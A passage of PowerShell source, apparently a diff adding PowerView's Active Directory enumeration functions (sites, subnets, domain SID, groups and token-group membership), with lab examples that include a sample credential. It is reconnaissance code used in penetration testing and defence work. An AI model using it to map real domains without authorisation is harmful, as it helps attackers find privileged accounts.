'^OU=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainOU] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $OUSearcher = Get-DomainSearcher @SearcherArguments + if (-not $OUSearcher) { + Write-Warning "[Get-DomainOU] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + else { + try { + $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + catch { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['GPLink']) { + Write-Verbose "[Get-DomainOU] Searching for OUs with $GPLink set in the gpLink property" + $Filter += "(gplink=*$GPLink*)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainOU] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $OUSearcher.filter = "(&(objectCategory=organizationalUnit)$Filter)" + Write-Verbose "[Get-DomainOU] Get-DomainOU filter string: $($OUSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $OUSearcher.FindOne() } + else { $Results = $OUSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $OU = $_ + } + else { + $OU = Convert-LDAPProperty -Properties $_.Properties + } + $OU.PSObject.TypeNames.Insert(0, 'PowerView.OU') + $OU + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainOU] Error disposing of the Results object: $_" + } + } + $OUSearcher.dispose() + } + } +} + + +function Get-DomainSite { +<# +.SYNOPSIS + +Search for all sites or specific site objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties whencreated,usnchanged,...". By default, all site objects for +the current domain are returned. + +.PARAMETER Identity + +An site name (e.g. Test-Site), DistinguishedName (e.g. CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or +GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted. + +.PARAMETER GPLink + +Only return sites with the specified GUID in their gplink property. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainSite + +Returns the current sites in the domain. + +.EXAMPLE + +Get-DomainSite *admin* -Domain testlab.local + +Returns all sites with "admin" in their name in the testlab.local domain. + +.EXAMPLE + +Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" + +Returns all sites with linked to the specified group policy object. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSite -Credential $Cred + +.OUTPUTS + +PowerView.Site + +Custom PSObject with translated site property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.Site')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + [Alias('GUID')] + $GPLink, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'SearchBasePrefix' = 'CN=Sites,CN=Configuration' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $SiteSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($SiteSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^CN=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainSite] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $SiteSearcher = Get-DomainSearcher @SearcherArguments + if (-not $SiteSearcher) { + Write-Warning "[Get-DomainSite] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + else { + try { + $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + catch { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['GPLink']) { + Write-Verbose "[Get-DomainSite] Searching for sites with $GPLink set in the gpLink property" + $Filter += "(gplink=*$GPLink*)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainSite] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $SiteSearcher.filter = "(&(objectCategory=site)$Filter)" + Write-Verbose "[Get-DomainSite] Get-DomainSite filter string: $($SiteSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $SiteSearcher.FindAll() } + else { $Results = $SiteSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Site = $_ + } + else { + $Site = Convert-LDAPProperty -Properties $_.Properties + } + $Site.PSObject.TypeNames.Insert(0, 'PowerView.Site') + $Site + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainSite] Error disposing of the Results object" + } + } + $SiteSearcher.dispose() + } + } +} + + +function Get-DomainSubnet { +<# +.SYNOPSIS + +Search for all subnets or specific subnets objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties whencreated,usnchanged,...". By default, all subnet objects for +the current domain are returned. + +.PARAMETER Identity + +An subnet name (e.g. '192.168.50.0/24'), DistinguishedName (e.g. 'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'), +or GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted. + +.PARAMETER SiteName + +Only return subnets from the specified SiteName. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainSubnet + +Returns the current subnets in the domain. + +.EXAMPLE + +Get-DomainSubnet *admin* -Domain testlab.local + +Returns all subnets with "admin" in their name in the testlab.local domain. + +.EXAMPLE + +Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" + +Returns all subnets with linked to the specified group policy object. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSubnet -Credential $Cred + +.OUTPUTS + +PowerView.Subnet + +Custom PSObject with translated subnet property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.Subnet')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $SiteName, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'SearchBasePrefix' = 'CN=Subnets,CN=Sites,CN=Configuration' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $SubnetSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($SubnetSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^CN=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainSubnet] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $SubnetSearcher = Get-DomainSearcher @SearcherArguments + if (-not $SubnetSearcher) { + Write-Warning "[Get-DomainSubnet] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + else { + try { + $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + catch { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainSubnet] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $SubnetSearcher.filter = "(&(objectCategory=subnet)$Filter)" + Write-Verbose "[Get-DomainSubnet] Get-DomainSubnet filter string: $($SubnetSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $SubnetSearcher.FindOne() } + else { $Results = $SubnetSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Subnet = $_ + } + else { + $Subnet = Convert-LDAPProperty -Properties $_.Properties + } + $Subnet.PSObject.TypeNames.Insert(0, 'PowerView.Subnet') + + if ($PSBoundParameters['SiteName']) { + # have to do the filtering after the LDAP query as LDAP doesn't let you specify + # wildcards for 'siteobject' :( + if ($Subnet.properties -and ($Subnet.properties.siteobject -like "*$SiteName*")) { + $Subnet + } + elseif ($Subnet.siteobject -like "*$SiteName*") { + $Subnet + } + } + else { + $Subnet + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainSubnet] Error disposing of the Results object: $_" + } + } + $SubnetSearcher.dispose() + } + } +} + + +function Get-DomainSID { +<# +.SYNOPSIS + +Returns the SID for the current domain or the specified domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer + +.DESCRIPTION + +Returns the SID for the current domain or the specified domain by executing +Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192) +to search for domain controllers through LDAP. The SID of the returned domain controller +is then extracted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainSID + +.EXAMPLE + +Get-DomainSID -Domain testlab.local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSID -Credential $Cred + +.OUTPUTS + +String + +A string representing the specified domain SID. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] + [CmdletBinding()] + Param( + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $SearcherArguments = @{ + 'LDAPFilter' = '(userAccountControl:1.2.840.113556.1.4.803:=8192)' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $DCSID = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1 -ExpandProperty objectsid + + if ($DCSID) { + $DCSID.SubString(0, $DCSID.LastIndexOf('-')) + } + else { + Write-Verbose "[Get-DomainSID] Error extracting domain SID for '$Domain'" + } +} + + +function Get-DomainGroup { +<# +.SYNOPSIS + +Return all groups or specific group objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all group objects for +the current domain are returned. To return the groups a specific user/group is +a part of, use -MemberIdentity X to execute token groups enumeration. + +.PARAMETER Identity + +A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to query for. Wildcards accepted. + +.PARAMETER MemberIdentity + +A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the user/group member to query for group membership. + +.PARAMETER AdminCount + +Switch. Return users with '(adminCount=1)' (meaning are/were privileged). + +.PARAMETER GroupScope + +Specifies the scope (DomainLocal, Global, or Universal) of the group(s) to search for. +Also accepts NotDomainLocal, NotGloba, and NotUniversal as negations. + +.PARAMETER GroupProperty + +Specifies a specific property to search for when performing the group search. +Possible values are Security, Distribution, CreatedBySystem, and NotCreatedBySystem. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainGroup | select samaccountname + +samaccountname +-------------- +WinRMRemoteWMIUsers__ +Administrators +Users +Guests +Print Operators +Backup Operators +... + +.EXAMPLE + +Get-DomainGroup *admin* | select distinguishedname + +distinguishedname +----------------- +CN=Administrators,CN=Builtin,DC=testlab,DC=local +CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local +CN=Schema Admins,CN=Users,DC=testlab,DC=local +CN=Enterprise Admins,CN=Users,DC=testlab,DC=local +CN=Domain Admins,CN=Users,DC=testlab,DC=local +CN=DnsAdmins,CN=Users,DC=testlab,DC=local +CN=Server Admins,CN=Users,DC=testlab,DC=local +CN=Desktop Admins,CN=Users,DC=testlab,DC=local + +.EXAMPLE + +Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl + +samaccountname +-------------- +Server Admins + +.EXAMPLE + +'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose +VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local +VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local))) + +usncreated : 13245 +grouptype : -2147483646 +samaccounttype : 268435456 +samaccountname : Desktop Admins +whenchanged : 8/10/2016 12:30:30 AM +objectsid : S-1-5-21-890171859-3433809279-3366196753-1118 +objectclass : {top, group} +cn : Desktop Admins +usnchanged : 13255 +dscorepropagationdata : 1/1/1601 12:00:00 AM +name : Desktop Admins +distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +whencreated : 8/10/2016 12:29:43 AM +instancetype : 4 +objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71 +objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGroup -Credential $Cred + +.EXAMPLE + +Get-Domain | Select-Object -Expand name +testlab.local + +'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainGroup] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainGroup] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins))) + +distinguishedname +----------------- +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +.OUTPUTS + +PowerView.Group + +Custom PSObject with translated group property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.Group')] + [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [Alias('UserName')] + [String] + $MemberIdentity, + + [Switch] + $AdminCount, + + [ValidateSet('DomainLocal', 'NotDomainLocal', 'Global', 'NotGlobal', 'Universal', 'NotUniversal')] + [Alias('Scope')] + [String] + $GroupScope, + + [ValidateSet('Security', 'Distribution', 'CreatedBySystem', 'NotCreatedBySystem')] + [String] + $GroupProperty, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $GroupSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($GroupSearcher) { + if ($PSBoundParameters['MemberIdentity']) { + + if ($SearcherArguments['Properties']) { + $OldProperties = $SearcherArguments['Properties'] + } + + $SearcherArguments['Identity'] = $MemberIdentity + $SearcherArguments['Raw'] = $True + + Get-DomainObject @SearcherArguments | ForEach-Object { + # convert the user/group to a directory entry + $ObjectDirectoryEntry = $_.GetDirectoryEntry() + + # cause the cache to calculate the token groups for the user/group + $ObjectDirectoryEntry.RefreshCache('tokenGroups') + + $ObjectDirectoryEntry.TokenGroups | ForEach-Object { + # convert the token group sid + $GroupSid = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value + + # ignore the built in groups + if ($GroupSid -notmatch '^S-1-5-32-.*') { + $SearcherArguments['Identity'] = $GroupSid + $SearcherArguments['Raw'] = $False + if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties } + $Group = Get-DomainObject @SearcherArguments + if ($Group) { + $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group') + $Group + } + } + } + } + } + else { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^CN=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainGroup] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $GroupSearcher = Get-DomainSearcher @SearcherArguments + if (-not $GroupSearcher) { + Write-Warning "[Get-DomainGroup] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('\')) { + $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical + if 